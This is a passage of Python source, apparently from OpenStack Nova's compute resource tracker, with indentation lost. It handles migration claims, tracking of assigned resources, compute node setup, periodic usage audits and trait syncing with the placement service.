context, new_pci_requests, claim.claimed_numa_topology)
claimed_pci_devices = objects.PciDeviceList(
objects=claimed_pci_devices_objs)
claimed_resources = self._claim_resources(allocations)
old_resources = instance.resources
# TODO(jaypipes): Move claimed_numa_topology out of the Claim's
# constructor flow so the Claim constructor only tests whether
# resources can be claimed, not consume the resources directly.
mig_context = objects.MigrationContext(
context=context, instance_uuid=instance.uuid,
migration_id=migration.id,
old_numa_topology=instance.numa_topology,
new_numa_topology=claim.claimed_numa_topology,
old_pci_devices=instance.pci_devices,
new_pci_devices=claimed_pci_devices,
old_pci_requests=instance.pci_requests,
new_pci_requests=new_pci_requests,
old_resources=old_resources,
new_resources=claimed_resources)
instance.migration_context = mig_context
instance.save()
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(context, instance, migration,
nodename)
elevated = context.elevated()
self._update(elevated, cn)
return claim
def _create_migration(
self, context, instance, new_flavor, nodename, move_type=None,
):
"""Create a migration record for the upcoming resize. This should
be done while the COMPUTE_RESOURCES_SEMAPHORE is held so the resource
claim will not be lost if the audit process starts.
"""
migration = objects.Migration(context=context.elevated())
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
migration.old_instance_type_id = instance.flavor.id
migration.new_instance_type_id = new_flavor.id
migration.status = 'pre-migrating'
migration.instance_uuid = instance.uuid
migration.source_compute = instance.host
migration.source_node = instance.node
if move_type:
migration.migration_type = move_type
else:
migration.migration_type = migration_obj.determine_migration_type(
migration)
migration.create()
return migration
def _claim_existing_migration(self, migration, nodename):
"""Make an existing migration record count for resource tracking.
If a migration record was created already before the request made
it to this compute host, only set up the migration so it's included in
resource tracking. This should be done while the
COMPUTE_RESOURCES_SEMAPHORE is held.
"""
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
# NOTE(artom) Migration objects for live migrations are created with
# status 'accepted' by the conductor in live_migrate_instance() and do
# not have a 'pre-migrating' status.
if not migration.is_live_migration:
migration.status = 'pre-migrating'
migration.save()
def _claim_resources(self, allocations):
"""Claim resources according to assigned resources from allocations
and available resources in provider tree
"""
if not allocations:
return None
claimed_resources = []
for rp_uuid, alloc_dict in allocations.items():
try:
provider_data = self.provider_tree.data(rp_uuid)
except ValueError:
# If an instance is in evacuating, it will hold new and old
# allocations, but the provider UUIDs in old allocations won't
# exist in the current provider tree, so skip it.
LOG.debug("Skip claiming resources of provider %(rp_uuid)s, "
"since the provider UUIDs are not in provider tree.",
{'rp_uuid': rp_uuid})
continue
for rc, amount in alloc_dict['resources'].items():
if rc not in provider_data.resources:
# This means we don't use provider_data.resources to
# assign this kind of resource class, such as 'VCPU' for
# now, otherwise the provider_data.resources will be
# populated with this resource class when updating
# provider tree.
continue
assigned = self.assigned_resources[rp_uuid][rc]
free = provider_data.resources[rc] - assigned
if amount > len(free):
reason = (_("Needed %(amount)d units of resource class "
"%(rc)s, but %(avail)d are available.") %
{'amount': amount,
'rc': rc,
'avail': len(free)})
raise exception.ComputeResourcesUnavailable(reason=reason)
for i in range(amount):
claimed_resources.append(free.pop())
if claimed_resources:
self._add_assigned_resources(claimed_resources)
return objects.ResourceList(objects=claimed_resources)
def _populate_assigned_resources(self, context, instance_by_uuid):
"""Populate self.assigned_resources organized by resource class and
reource provider uuid, which is as following format:
{
$RP_UUID: {
$RESOURCE_CLASS: [objects.Resource, ...],
$RESOURCE_CLASS: [...]},
...}
"""
resources = []
# Get resources assigned to migrations
for mig in self.tracked_migrations.values():
mig_ctx = mig.instance.migration_context
# We might have a migration whose instance hasn't arrived here yet.
# Ignore it.
if not mig_ctx:
continue
if mig.source_compute == self.host and 'old_resources' in mig_ctx:
resources.extend(mig_ctx.old_resources or [])
if mig.dest_compute == self.host and 'new_resources' in mig_ctx:
resources.extend(mig_ctx.new_resources or [])
# Get resources assigned to instances
for uuid in self.tracked_instances:
resources.extend(instance_by_uuid[uuid].resources or [])
self.assigned_resources.clear()
self._add_assigned_resources(resources)
def _check_resources(self, context):
"""Check if there are assigned resources not found in provider tree"""
notfound = set()
for rp_uuid in self.assigned_resources:
provider_data = self.provider_tree.data(rp_uuid)
for rc, assigned in self.assigned_resources[rp_uuid].items():
notfound |= (assigned - provider_data.resources[rc])
if not notfound:
return
# This only happens when assigned resources are removed
# from the configuration and the compute service is SIGHUP'd
# or restarted.
resources = [(res.identifier, res.resource_class) for res in notfound]
reason = _("The following resources are assigned to instances, "
"but were not listed in the configuration: %s "
"Please check if this will influence your instances, "
"and restore your configuration if necessary") % resources
raise exception.AssignedResourceNotFound(reason=reason)
def _release_assigned_resources(self, resources):
"""Remove resources from self.assigned_resources."""
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
try:
self.assigned_resources[rp_uuid][rc].remove(resource)
except KeyError:
LOG.warning("Release resource %(rc)s: %(id)s of provider "
"%(rp_uuid)s, not tracked in "
"ResourceTracker.assigned_resources.",
{'rc': rc, 'id': resource.identifier,
'rp_uuid': rp_uuid})
def _add_assigned_resources(self, resources):
"""Add resources to self.assigned_resources"""
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
self.assigned_resources[rp_uuid][rc].add(resource)
def _set_instance_host_and_node(self, instance, nodename):
"""Tag the instance as belonging to this host. This should be done
while the COMPUTE_RESOURCES_SEMAPHORE is held so the resource claim
will not be lost if the audit process starts.
"""
# NOTE(mriedem): ComputeManager._nil_out_instance_obj_host_and_node is
# somewhat tightly coupled to the fields set in this method so if this
# method changes that method might need to be updated.
instance.host = self.host
instance.launched_on = self.host
instance.node = nodename
instance.save()
def _unset_instance_host_and_node(self, instance):
"""Untag the instance so it no longer belongs to the host.
This should be done while the COMPUTE_RESOURCES_SEMAPHORE is held so
the resource claim will not be lost if the audit process starts.
"""
instance.host = None
instance.node = None
instance.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def abort_instance_claim(self, context, instance, nodename):
"""Remove usage from the given instance."""
self._update_usage_from_instance(context, instance, nodename,
is_removed=True)
instance.clear_numa_topology()
self._unset_instance_host_and_node(instance)
self._update(context.elevated(), self.compute_nodes[nodename])
def _drop_pci_devices(self, instance, nodename, prefix):
if self.pci_tracker:
# free old/new allocated pci devices
pci_devices = self._get_migration_context_resource(
'pci_devices', instance, prefix=prefix)
if pci_devices:
for pci_device in pci_devices:
self.pci_tracker.free_device(pci_device, instance)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
self.compute_nodes[nodename].pci_device_pools = dev_pools_obj
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_source(self, context, instance, migration):
"""Drop a move claim after confirming a resize or cold migration."""
migration.status = 'confirmed'
migration.save()
self._drop_move_claim(
context, instance, migration.source_node, instance.old_flavor,
prefix='old_')
# NOTE(stephenfin): Unsetting this is unnecessary for cross-cell
# resize, since the source and dest instance objects are different and
# the source instance will be deleted soon. It's easier to just do it
# though.
instance.drop_migration_context()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim_at_dest(self, context, instance, migration):
"""Drop a move claim after reverting a resize or cold migration."""
# NOTE(stephenfin): This runs on the destination, before we return to
# the source and resume the instance there. As such, the migration
# isn't really really reverted yet, but this status is what we use to
# indicate that we no longer needs to account for usage on this host
migration.status = 'reverted'
migration.save()
self._drop_move_claim(
context, instance, migration.dest_node, instance.new_flavor,
prefix='new_')
instance.revert_migration_context()
instance.save(expected_task_state=[task_states.RESIZE_REVERTING])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def drop_move_claim(self, context, instance, nodename,
flavor=None, prefix='new_'):
self._drop_move_claim(
context, instance, nodename, flavor, prefix='new_')
def _drop_move_claim(
self, context, instance, nodename, flavor=None, prefix='new_',
):
"""Remove usage for an incoming/outgoing migration.
:param context: Security context.
:param instance: The instance whose usage is to be removed.
:param nodename: Host on which to remove usage. If the migration
completed successfully, this is normally the source. If it did not
complete successfully (failed or reverted), this is normally the
destination.
:param flavor: The flavor that determines the usage to remove. If the
migration completed successfully, this is the old flavor to be
removed from the source. If the migration did not complete
successfully, this is the new flavor to be removed from the
destination.
:param prefix: Prefix to use when accessing migration context
attributes. 'old_' or 'new_', with 'new_' being the default.
"""
# Remove usage for an instance that is tracked in migrations, such as
# on the dest node during revert resize.
if instance['uuid'] in self.tracked_migrations:
migration = self.tracked_migrations.pop(instance['uuid'])
if not flavor:
flavor = self._get_flavor(instance, prefix, migration)
# Remove usage for an instance that is not tracked in migrations (such
# as on the source node after a migration).
# NOTE(lbeliveau): On resize on the same node, the instance is
# included in both tracked_migrations and tracked_instances.
elif instance['uuid'] in self.tracked_instances:
self.tracked_instances.remove(instance['uuid'])
if flavor is not None:
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix=prefix)
usage = self._get_usage_dict(
flavor, instance, numa_topology=numa_topology)
self._drop_pci_devices(instance, nodename, prefix)
resources = self._get_migration_context_resource(
'resources', instance, prefix=prefix)
self._release_assigned_resources(resources)
self._update_usage(usage, nodename, sign=-1)
ctxt = context.elevated()
self._update(ctxt, self.compute_nodes[nodename])
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def update_usage(self, context, instance, nodename):
"""Update the resource usage and stats after a change in an
instance
"""
if self.disabled(nodename):
return
uuid = instance['uuid']
# don't update usage for this instance unless it submitted a resource
# claim first:
if uuid in self.tracked_instances:
self._update_usage_from_instance(context, instance, nodename)
self._update(context.elevated(), self.compute_nodes[nodename])
def disabled(self, nodename):
return (nodename not in self.compute_nodes or
not self.driver.node_is_available(nodename))
def _check_for_nodes_rebalance(self, context, resources, nodename):
"""Check if nodes rebalance has happened.
The ironic driver maintains a hash ring mapping bare metal nodes
to compute nodes. If a compute dies, the hash ring is rebuilt, and
some of its bare metal nodes (more precisely, those not in ACTIVE
state) are assigned to other computes.
This method checks for this condition and adjusts the database
accordingly.
:param context: security context
:param resources: initial values
:param nodename: node name
:returns: True if a suitable compute node record was found, else False
"""
if not self.driver.rebalances_nodes:
return False
# Its possible ironic just did a node re-balance, so let's
# check if there is a compute node that already has the correct
# hypervisor_hostname. We can re-use that rather than create a
# new one and have to move existing placement allocations
cn_candidates = objects.ComputeNodeList.get_by_hypervisor(
context, nodename)
if len(cn_candidates) == 1:
cn = cn_candidates[0]
LOG.info("ComputeNode %(name)s moving from %(old)s to %(new)s",
{"name": nodename, "old": cn.host, "new": self.host})
cn.host = self.host
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
self._update(context, cn)
return True
elif len(cn_candidates) > 1:
LOG.error(
"Found more than one ComputeNode for nodename %s. "
"Please clean up the orphaned ComputeNode records in your DB.",
nodename)
return False
def _init_compute_node(self, context, resources):
"""Initialize the compute node if it does not already exist.
The resource tracker will be inoperable if compute_node
is not defined. The compute_node will remain undefined if
we fail to create it or if there is no associated service
registered.
If this method has to create a compute node it needs initial
values - these come from resources.
:param context: security context
:param resources: initial values
:returns: True if a new compute_nodes table record was created,
False otherwise
"""
nodename = resources['hypervisor_hostname']
# if there is already a compute node just use resources
# to initialize
if nodename in self.compute_nodes:
cn = self.compute_nodes[nodename]
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
# now try to get the compute node record from the
# database. If we get one we use resources to initialize
cn = self._get_compute_node(context, nodename)
if cn:
self.compute_nodes[nodename] = cn
self._copy_resources(cn, resources)
self._setup_pci_tracker(context, cn, resources)
return False
if self._check_for_nodes_rebalance(context, resources, nodename):
return False
# there was no local copy and none in the database
# so we need to create a new compute node. This needs
# to be initialized with resource values.
cn = objects.ComputeNode(context)
cn.host = self.host
self._copy_resources(cn, resources, initial=True)
cn.create()
# Only map the ComputeNode into compute_nodes if create() was OK
# because if create() fails, on the next run through here nodename
# would be in compute_nodes and we won't try to create again (because
# of the logic above).
self.compute_nodes[nodename] = cn
LOG.info('Compute node record created for '
'%(host)s:%(node)s with uuid: %(uuid)s',
{'host': self.host, 'node': nodename, 'uuid': cn.uuid})
self._setup_pci_tracker(context, cn, resources)
return True
def _setup_pci_tracker(self, context, compute_node, resources):
if not self.pci_tracker:
self.pci_tracker = pci_manager.PciDevTracker(context, compute_node)
if 'pci_passthrough_devices' in resources:
dev_json = resources.pop('pci_passthrough_devices')
self.pci_tracker.update_devices_from_hypervisor_resources(
dev_json)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
compute_node.pci_device_pools = dev_pools_obj
def _copy_resources(self, compute_node, resources, initial=False):
"""Copy resource values to supplied compute_node."""
nodename = resources['hypervisor_hostname']
stats = self.stats[nodename]
# purge old stats and init with anything passed in by the driver
# NOTE(danms): Preserve 'failed_builds' across the stats clearing,
# as that is not part of resources
# TODO(danms): Stop doing this when we get a column to store this
# directly
prev_failed_builds = stats.get('failed_builds', 0)
stats.clear()
stats['failed_builds'] = prev_failed_builds
stats.digest_stats(resources.get('stats'))
compute_node.stats = stats
# Update the allocation ratios for the related ComputeNode object
# but only if the configured values are not the default; the
# ComputeNode._from_db_object method takes care of providing default
# allocation ratios when the config is left at the default, so
# we'll really end up with something like a
# ComputeNode.cpu_allocation_ratio of 16.0. We want to avoid
# resetting the ComputeNode fields to None because that will make
# the _resource_change method think something changed when really it
# didn't.
# NOTE(yikun): The CONF.initial_(cpu|ram|disk)_allocation_ratio would
# be used when we initialize the compute node object, that means the
# ComputeNode.(cpu|ram|disk)_allocation_ratio will be set to
# CONF.initial_(cpu|ram|disk)_allocation_ratio when initial flag is
# True.
for res in ('cpu', 'disk', 'ram'):
attr = '%s_allocation_ratio' % res
if initial:
conf_alloc_ratio = getattr(CONF, 'initial_%s' % attr)
else:
conf_alloc_ratio = getattr(self, attr)
# NOTE(yikun): In Stein version, we change the default value of
# (cpu|ram|disk)_allocation_ratio from 0.0 to None, but we still
# should allow 0.0 to keep compatibility, and this 0.0 condition
# will be removed in the next version (T version).
if conf_alloc_ratio not in (0.0, None):
setattr(compute_node, attr, conf_alloc_ratio)
# now copy rest to compute_node
compute_node.update_from_virt_driver(resources)
def remove_node(self, nodename):
"""Handle node removal/rebalance.
Clean up any stored data about a compute node no longer
managed by this host.
"""
self.stats.pop(nodename, None)
self.compute_nodes.pop(nodename, None)
self.old_resources.pop(nodename, None)
def _get_host_metrics(self, context, nodename):
"""Get the metrics from monitors and
notify information to message bus.
"""
metrics = objects.MonitorMetricList()
metrics_info = {}
for monitor in self.monitors:
try:
monitor.populate_metrics(metrics)
except NotImplementedError:
LOG.debug("The compute driver doesn't support host "
"metrics for %(mon)s", {'mon': monitor})
except Exception as exc:
LOG.warning("Cannot get the metrics from %(mon)s; "
"error: %(exc)s",
{'mon': monitor, 'exc': exc})
# TODO(jaypipes): Remove this when compute_node.metrics doesn't need
# to be populated as a JSONified string.
metric_list = metrics.to_list()
if len(metric_list):
metrics_info['nodename'] = nodename
metrics_info['metrics'] = metric_list
metrics_info['host'] = self.host
metrics_info['host_ip'] = CONF.my_ip
notifier = rpc.get_notifier(service='compute', host=nodename)
notifier.info(context, 'compute.metrics.update', metrics_info)
compute_utils.notify_about_metrics_update(
context, self.host, CONF.my_ip, nodename, metrics)
return metric_list
def update_available_resource(self, context, nodename, startup=False):
"""Override in-memory calculations of compute node resource usage based
on data audited from the hypervisor layer.
Add in resource claims in progress to account for operations that have
declared a need for resources, but not necessarily retrieved them from
the hypervisor layer yet.
:param nodename: Temporary parameter representing the Ironic resource
node. This parameter will be removed once Ironic
baremetal resource nodes are handled like any other
resource in the system.
:param startup: Boolean indicating whether we're running this on
on startup (True) or periodic (False).
"""
LOG.debug("Auditing locally available compute resources for "
"%(host)s (node: %(node)s)",
{'node': nodename,
'host': self.host})
resources = self.driver.get_available_resource(nodename)
# NOTE(jaypipes): The resources['hypervisor_hostname'] field now
# contains a non-None value, even for non-Ironic nova-compute hosts. It
# is this value that will be populated in the compute_nodes table.
resources['host_ip'] = CONF.my_ip
# We want the 'cpu_info' to be None from the POV of the
# virt driver, but the DB requires it to be non-null so
# just force it to empty string
if "cpu_info" not in resources or resources["cpu_info"] is None:
resources["cpu_info"] = ''
self._verify_resources(resources)
self._report_hypervisor_resource_view(resources)
self._update_available_resource(context, resources, startup=startup)
def _pair_instances_to_migrations(self, migrations, instance_by_uuid):
for migration in migrations:
try:
migration.instance = instance_by_uuid[migration.instance_uuid]
except KeyError:
# NOTE(danms): If this happens, we don't set it here, and
# let the code either fail or lazy-load the instance later
# which is what happened before we added this optimization.
# NOTE(tdurakov) this situation is possible for resize/cold
# migration when migration is finished but haven't yet
# confirmed/reverted in that case instance already changed host
# to destination and no matching happens
LOG.debug('Migration for instance %(uuid)s refers to '
'another host\'s instance!',
{'uuid': migration.instance_uuid})
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def _update_available_resource(self, context, resources, startup=False):
# initialize the compute node object, creating it
# if it does not already exist.
is_new_compute_node = self._init_compute_node(context, resources)
nodename = resources['hypervisor_hostname']
# if we could not init the compute node the tracker will be
# disabled and we should quit now
if self.disabled(nodename):
return
# Grab all instances assigned to this node:
instances = objects.InstanceList.get_by_host_and_node(
context, self.host, nodename,
expected_attrs=['system_metadata',
'numa_topology',
'flavor', 'migration_context',
'resources'])
# Grab all in-progress migrations and error migrations:
migrations = objects.MigrationList.get_in_progress_and_error(
context, self.host, nodename)
# Check for tracked instances with in-progress, incoming, but not
# finished migrations. For those instance the migration context
# is not applied yet (it will be during finish_resize when the
# migration goes to finished state). We need to manually and
# temporary apply the migration context here when the resource usage is
# updated. See bug 1953359 for more details.
instance_by_uuid = {instance.uuid: instance for instance in instances}
for migration in migrations:
if (
migration.instance_uuid in instance_by_uuid and
migration.dest_compute == self.host and
migration.dest_node == nodename
):
# we does not check for the 'post-migrating' migration status
# as applying the migration context for an instance already
# in finished migration status is a no-op anyhow.
instance = instance_by_uuid[migration.instance_uuid]
LOG.debug(
'Applying migration context for instance %s as it has an '
'incoming, in-progress migration %s. '
'Migration status is %s',
migration.instance_uuid, migration.uuid, migration.status
)
# It is OK not to revert the migration context at the end of
# the periodic as the instance is not saved during the periodic
instance.apply_migration_context()
# Now calculate usage based on instance utilization:
instance_by_uuid = self._update_usage_from_instances(
context, instances, nodename)
self._pair_instances_to_migrations(migrations, instance_by_uuid)
self._update_usage_from_migrations(context, migrations, nodename)
# A new compute node means there won't be a resource provider yet since
# that would be created via the _update() call below, and if there is
# no resource provider then there are no allocations against it.
if not is_new_compute_node:
self._remove_deleted_instances_allocations(
context, self.compute_nodes[nodename], migrations,
instance_by_uuid)
cn = self.compute_nodes[nodename]
# NOTE(yjiang5): Because pci device tracker status is not cleared in
# this periodic task, and also because the resource tracker is not
# notified when instances are deleted, we need remove all usages
# from deleted instances.
self.pci_tracker.clean_usage(instances, migrations)
dev_pools_obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = dev_pools_obj
self._report_final_resource_view(nodename)
metrics = self._get_host_metrics(context, nodename)
# TODO(pmurray): metrics should not be a json string in ComputeNode,
# but it is. This should be changed in ComputeNode
cn.metrics = jsonutils.dumps(metrics)
# Update assigned resources to self.assigned_resources
self._populate_assigned_resources(context, instance_by_uuid)
# update the compute_node
self._update(context, cn, startup=startup)
LOG.debug('Compute_service record updated for %(host)s:%(node)s',
{'host': self.host, 'node': nodename})
# Check if there is any resource assigned but not found
# in provider tree
if startup:
self._check_resources(context)
def _get_compute_node(self, context, nodename):
"""Returns compute node for the host and nodename."""
try:
return objects.ComputeNode.get_by_host_and_nodename(
context, self.host, nodename)
except exception.NotFound:
LOG.warning("No compute node record for %(host)s:%(node)s",
{'host': self.host, 'node': nodename})
def _report_hypervisor_resource_view(self, resources):
"""Log the hypervisor's view of free resources.
This is just a snapshot of resource usage recorded by the
virt driver.
The following resources are logged:
- free memory
- free disk
- free CPUs
- assignable PCI devices
"""
nodename = resources['hypervisor_hostname']
free_ram_mb = resources['memory_mb'] - resources['memory_mb_used']
free_disk_gb = resources['local_gb'] - resources['local_gb_used']
vcpus = resources['vcpus']
if vcpus:
free_vcpus = vcpus - resources['vcpus_used']
else:
free_vcpus = 'unknown'
pci_devices = resources.get('pci_passthrough_devices')
LOG.debug("Hypervisor/Node resource view: "
"name=%(node)s "
"free_ram=%(free_ram)sMB "
"free_disk=%(free_disk)sGB "
"free_vcpus=%(free_vcpus)s "
"pci_devices=%(pci_devices)s",
{'node': nodename,
'free_ram': free_ram_mb,
'free_disk': free_disk_gb,
'free_vcpus': free_vcpus,
'pci_devices': pci_devices})
def _report_final_resource_view(self, nodename):
"""Report final calculate of physical memory, used virtual memory,
disk, usable vCPUs, used virtual CPUs and PCI devices,
including instance calculations and in-progress resource claims. These
values will be exposed via the compute node table to the scheduler.
"""
cn = self.compute_nodes[nodename]
vcpus = cn.vcpus
if vcpus:
tcpu = vcpus
ucpu = cn.vcpus_used
LOG.debug("Total usable vcpus: %(tcpu)s, "
"total allocated vcpus: %(ucpu)s",
{'tcpu': vcpus,
'ucpu': ucpu})
else:
tcpu = 0
ucpu = 0
pci_stats = (list(cn.pci_device_pools) if
cn.pci_device_pools else [])
LOG.debug("Final resource view: "
"name=%(node)s "
"phys_ram=%(phys_ram)sMB "
"used_ram=%(used_ram)sMB "
"phys_disk=%(phys_disk)sGB "
"used_disk=%(used_disk)sGB "
"total_vcpus=%(total_vcpus)s "
"used_vcpus=%(used_vcpus)s "
"pci_stats=%(pci_stats)s",
{'node': nodename,
'phys_ram': cn.memory_mb,
'used_ram': cn.memory_mb_used,
'phys_disk': cn.local_gb,
'used_disk': cn.local_gb_used,
'total_vcpus': tcpu,
'used_vcpus': ucpu,
'pci_stats': pci_stats})
def _resource_change(self, compute_node):
"""Check to see if any resources have changed."""
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if not obj_base.obj_equal_prims(
compute_node, old_compute, ['updated_at']):
self.old_resources[nodename] = copy.deepcopy(compute_node)
return True
return False
def _sync_compute_service_disabled_trait(self, context, traits):
"""Synchronize the COMPUTE_STATUS_DISABLED trait on the node provider.
Determines if the COMPUTE_STATUS_DISABLED trait should be added to
or removed from the provider's set of traits based on the related
nova-compute service disabled status.
:param context: RequestContext for cell database access
:param traits: set of traits for the compute node resource provider;
this is modified by reference
"""
trait = os_traits.COMPUTE_STATUS_DISABLED
try:
service = objects.Service.get_by_compute_host(context, self.host)
if service.disabled:
# The service is disabled so make sure the trait is reported.
traits.add(trait)
else:
# The service is not disabled so do not report the trait.
traits.discard(trait)
except exception.NotFound:
# This should not happen but handle it gracefully. The scheduler
# should ignore this node if the compute service record is gone.
LOG.error('Unable to find services table record for nova-compute '
'host %s', self.host)
def _get_traits(self, context, nodename, provider_tree):
"""Synchronizes internal and external traits for the node provider.
This works in conjunction with the ComptueDriver.update_provider_tree
flow and is used to synchronize traits reported by the compute driver,
traits based on information in the ComputeNode record, and traits set
externally using the placement REST API.
:param context: RequestContext for cell database access
:param nodename: ComputeNode.hypervisor_hostname for the compute node
resource provider whose traits are being synchronized; the node
must be in the ProviderTree.
:param provider_tree: ProviderTree being updated
"""
# Get the traits from the ProviderTree which will be the set
# of virt-owned traits plus any externally defined traits set
# on the provider that aren't owned by the virt driver.
traits = provider_tree.data(nodename).traits
# Now get the driver's capabilities and add any supported
# traits that are missing, and remove any existing set traits
# that are not currently supported.
for trait, supported in self.driver.capabilities_as_traits().items():
if supported:
traits.add(trait)
elif trait in traits:
traits.remove(trait)
# Always mark the compute node. This lets other processes (possibly
# unrelated to nova or even OpenStack) find and distinguish these
# providers easily.
traits.add(os_traits.COMPUTE_NODE)
self._sync_compute_service_disabled_trait(context, traits)
return list(traits)
@retrying.retry(stop_max_attempt_number=4,
retry_on_exception=lambda e: isinstance(
e, exception.ResourceProviderUpdateConflict))
def _update_to_placement(self, context, compute_node, startup):
"""Send resource and inventory changes to placement."""
# NOTE(jianghuaw): Some resources(e.g. VGPU) are not saved in the
# object of compute_node; instead the inventory data for these
# resource is reported by driver's update_provider_tree(). So even if
# there is no resource change for compute_node, we need proceed
# to get inventory and use report client interfaces to update
# inventory to placement. It's report client's responsibility to
# ensure the update request to placement only happens when inventory
# is changed.
nodename = compute_node.hypervisor_hostname
# Persist the stats to the Scheduler
# Retrieve the provider tree associated with this compute node. If
# it doesn't exist yet, this will create it with a (single, root)
# provider corresponding to the compute node.
prov_tree = self.reportclient.get_provider_tree_and_ensure_root(
context, compute_node.uuid, name=compute_node.hypervisor_hostname)
# Let the virt driver rearrange the provider tree and set/update
# the inventory, traits, and aggregates throughout.
allocs = None
try:
self.driver.update_provider_tree(prov_tree, nodename)
except exception.ReshapeNeeded:
if not startup:
# This isn't supposed to happen during periodic, so raise
# it up; the compute manager will treat it specially.
raise
LOG.info("Performing resource provider inventory and "
"allocation data migration during compute service "
"startup or fast-forward upgrade.")
allocs = self.reportclient.get_allocations_for_provider_tree(
context, nodename)
self.driver.update_provider_tree(prov_tree, nodename,
allocations=allocs)
# Inject driver capabilities traits into the provider
# tree. We need to determine the traits that the virt
# driver owns - so those that come from the tree itself
# (via the virt driver) plus the compute capabilities
# traits, and then merge those with the traits set
# externally that the driver does not own - and remove any
# set on the provider externally that the virt owns but
# aren't in the current list of supported traits. For
# example, let's say we reported multiattach support as a
# trait at t1 and then at t2 it's not, so we need to
# remove it. But at both t1 and t2 there is a
# CUSTOM_VENDOR_TRAIT_X which we can't touch because it
# was set externally on the provider.
# We also want to sync the COMPUTE_STATUS_DISABLED trait based
# on the related nova-compute service's disabled status.
traits = self._get_traits(
context, nodename, provider_tree=prov_tree)
prov_tree.update_traits(nodename, traits)
self.provider_tree = prov_tree
# This merges in changes from the provider config files loaded in init
self._merge_provider_configs(self.provider_configs, prov_tree)
# Flush any changes. If we processed ReshapeNeeded above, allocs is not
# None, and this will hit placement's POST /reshaper route.
self.reportclient.update_from_provider_tree(context, prov_tree,
allocations=allocs)
def _update(self, context, compute_node, startup=False):
"""Update partial stats locally and populate them to Scheduler."""
# _resource_change will update self.old_resources if it detects changes
# but we want to restore those if compute_node.save() fails.
nodename = compute_node.hypervisor_hostname
old_compute = self.old_resources[nodename]
if self._resource_change(compute_node):
# If the compute_node's resource changed, update to DB. Note that
# _update_to_placement below does not supersede the need to do this
# because there are stats-related fields in the ComputeNode object
# which could have changed and still need to be reported to the
# scheduler filters/weighers (which could be out of tree as well).
try:
compute_node.save()
except Exception:
# Restore the previous state in self.old_resources so that on
# the next trip through here _resource_change does not have
# stale data to compare.
with excutils.save_and_reraise_exception(logger=LOG):
self.old_resources[nodename] = old_compute
self._update_to_placement(context, compute_node, startup)
if self.pci_tracker:
self.pci_tracker.save(context)
def _update_usage(self, usage, nodename, sign=1):
# TODO(stephenfin): We don't use the CPU, RAM and disk fields for much
# except 'Aggregate(Core|Ram|Disk)Filter', the 'os-hypervisors' API,
# and perhaps some out-of-tree filters. Once the in-tree stuff is
# removed or updated to use information from placement, we can think
# about dropping the fields from the 'ComputeNode' object entirely
mem_usage = usage['memory_mb']
disk_usage = usage.get('root_gb', 0)
vcpus_usage = usage.get('vcpus', 0)
cn = self.compute_nodes[nodename]
cn.memory_mb_used += sign * mem_usage
cn.local_gb_used += sign * disk_usage
cn.local_gb_used += sign * usage.get('ephemeral_gb', 0)
cn.local_gb_used += sign * usage.get('swap', 0) / 1024
cn.vcpus_used += sign * vcpus_usage
# free ram and disk may be negative, depending on policy:
cn.free_ram_mb = cn.memory_mb - cn.memory_mb_used
cn.free_disk_gb = cn.local_gb - cn.local_gb_used
stats = self.stats[nodename]
cn.running_vms = stats.num_instances
# calculate the NUMA usage, assuming the instance is actually using
# NUMA, of course
if cn.numa_topology and usage.get('numa_topology'):
instance_numa_topology = usage.get('numa_topology')
# the ComputeNode.numa_topology field is a StringField, so
# deserialize
host_numa_topology = objects.NUMATopology.obj_from_db_obj(
cn.numa_topology)
free = sign == -1
# ...and reserialize once we save it back
cn.numa_topology = hardware.numa_usage_from_instance_numa(
host_numa_topology, instance_numa_topology, free)._to_json()
def _get_migration_context_resource(self, resource, instance,
prefix='new_'):
migration_context = instance.migration_context
resource = prefix + resource
if migration_context and resource in migration_context:
return getattr(migration_context, resource)
return None
def _update_usage_from_migration(self, context, instance, migration,
nodename):
"""Update usage for a single migration. The record may
represent an incoming or outbound migration.
"""
uuid = migration.instance_uuid
LOG.info("Updating resource usage from migration %s", migration.uuid,
instance_uuid=uuid)
incoming = (migration.dest_compute == self.host and
migration.dest_node == nodename)
outbound = (migration.source_compute == self.host and
migration.source_node == nodename)
same_node = (incoming and outbound)
tracked = uuid in self.tracked_instances
itype = None
numa_topology = None
sign = 0
if same_node:
# Same node resize. Record usage for the 'new_' resources. This
# is executed on resize_claim().
if instance['instance_type_id'] == migration.old_instance_type_id:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
else:
# The instance is already set to the new flavor (this is done
# by the compute manager on finish_resize()), hold space for a
# possible revert to the 'old_' resources.
# NOTE(lbeliveau): When the periodic audit timer gets
# triggered, the compute usage gets reset. The usage for an
# instance that is migrated to the new flavor but not yet
# confirmed/reverted will first get accounted for by
# _update_usage_from_instances(). This method will then be
# called, and we need to account for the '_old' resources
# (just in case).
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
elif incoming and not tracked:
# instance has not yet migrated here:
itype = self._get_flavor(instance, 'new_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance)
# Allocate pci device(s) for the instance.
sign = 1
LOG.debug('Starting to track incoming migration %s with flavor %s',
